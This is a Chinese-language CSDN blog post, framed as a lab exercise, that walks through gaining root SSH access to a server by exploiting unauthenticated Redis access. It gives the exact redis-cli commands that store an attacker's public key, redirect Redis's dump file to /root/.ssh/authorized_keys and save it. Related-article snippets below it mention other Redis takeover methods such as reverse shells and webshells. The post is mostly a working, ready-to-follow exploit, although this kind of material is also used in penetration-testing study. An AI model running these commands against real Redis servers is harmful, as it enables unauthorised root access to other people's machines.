Redis未授权访问配合SSH key的综合利用

最新推荐文章于 2024-05-03 23:07:14 发布
最新推荐文章于 2024-05-03 23:07:14 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 渗透测试 开源组件 文章标签: 安全测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyy615545936/article/details/100747855
版权

【实验原理】

利用 Redis 自身的提供的 config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。

步骤一:在本地生产公私钥文件

linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公私钥文件

步骤二:将公钥写入临时文件中,(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt   

注意需要在文件的头部和尾部多留几个空行,以便公钥始终可以保持在单独的一行而不会和其他数据混在一行中(刚开始没注意到,一直导致登录目标服务器不成功)

步骤三:连接redis运用config命令写入文件

cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit   表示在主机172.16.12.2上的redis数据库中插入一条记录,对应的键名为crackit(键名可以是其他字符串,不一定需要写成crackit),键值为foo.txt中的内容;

 4.redis 172.16.12.2 :6379> config set dir /root/.ssh/,用于将Redis数据库硬盘备份文件的存放目录修改为/root/.ssh/;

 5.redis 172.16.12.2 :6379> config set dbfilename authorized_keys,用于将Redis数据硬盘库备份文件的名字修改为authorized_keys;

  6.redis 172.16.12.2 :6379> save,将Redis数据库在内存中的数据保存到硬盘备份文件中,即转储到/root/.ssh/authorized_keys文件中;

输入私钥口令成功登录172.16.12.2服务器


————————————————
 

hyy615545936
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis授权ssh公钥登录
m0_46576302的博客
09-09 3709
利用redis的备份功能,ssh公钥
redis授权getshell四种方式
BING
04-24 4203
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Xshell工具利用Redis 6379SSH公钥漏洞
maple_leaf
05-03 354
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥。
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5098
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据入磁盘或者把修改入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Redis授权访问漏洞(四)SSH key免密登录
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-10 847
步骤一:我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器。然后回到我们攻击机的.ssh目录下,注意这一步必须在.ssh目录下执行,不然会找不到文件的。发现两个文件的内容居然是一样的,那么现在我们是不是可以实现ssh-key免密登录了?好了,ssh-key免密登录的流程已经复习完毕了,正式进入我们的实战试验吧。注意:生成的目录是.ssh,是一个隐藏的目录。我们的靶机上出现了刚刚我们从客户端传来的文件。这里让我们输入靶机root用户的密码。
Redis授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 800
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippokey-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/的场合使用它快速读/ 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
Redis授权访问配合SSH key文件利用详解
01-19
Redis授权访问配合SSH key文件利用详解】 Redis是一个高性能的键值数据库,它支持网络交互,可以在内存中存储数据并可持久化。由于其高效和灵活的特性,Redis被广泛应用在各种场景中。然而,Redis的安全性问题...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
python脚本实现Redis授权批量提权
12-16
本文主要给大家介绍了关于redis授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: ...
redis授权访问
weixin_65219040的博客
06-18 9185
redis
redisssh-keygen
weixin_34112181的博客
01-19 69
在ubuntu上安装是非常方便的,两个命令就行了。 $sudo apt-get update $sudo apt-get install redis-server 若是redis-cli命令出现redis 127.0.0.1:6379>,则安装成功了 如何根据Redisssh入侵入侵服务器。原...
Redis-密钥登录ssh,免密码
weixin_54227009的博客
06-06 1845
1、在kali上生成密钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无密码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的密钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥key.txt中将key.txt导入进目标机器cat
Redis授权访问ssh免密登录(踩坑)
Zlirving_的博客
06-29 4335
关于Redis漏洞的详解及shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行文件操作,攻击者可以成功将自己的公钥入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
redis_授权访问
scu_hacker博客
01-13 7736
本文介绍redis授权访问的4种利用方式
redis授权访问漏洞环境搭建复现-ssh免密登录
冯的博客
01-05 3099
首先,安装redis 我是直接sudo apt-get redis 安装的 然后启动redis 直接找到/usr/bin目录下的redis-server和redis-cli 测试连接成功 因为我是腾讯云的服务器,想要本地远程访问6379端口需要具备三个条件: 1配置规则 2 配置防火墙,我这里因为只是测试一下就直接关闭了防火墙,这里使用ufw disable关闭防火墙,使用ufw status 查看是否成功 3 第三个是要去redis.conf中配置一下 这里原本是..
利用Redis漏洞实现ssh免密登陆
g1418377085的博客
06-13 3379
# 漏洞的先决条件目标服务器的redis以root用户运行且免密登录目标服务器开启了ssh免密登录  # 实验准备环境Redis : 2.4.16攻击主机:192.168.247.139目标主机:192.168.247.138# 漏洞利用过程...
[分布式][Redis]SSH框架和Redis的整合
疯一样的女子
03-26 582
一个已有的Struts+Spring+Hibernate项目,以前使用MySQL数据库,现在想把Redis也整合进去。 1. 相关Jar文件 下载并导入以下3个Jar文件: commons-pool2-2.4.2.jar、jedis-2.3.1.jar、spring-data-redis-1.3.4.RELEASE.jar。 2. Redis配置文件 在src文件夹下面新建一个redis...
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值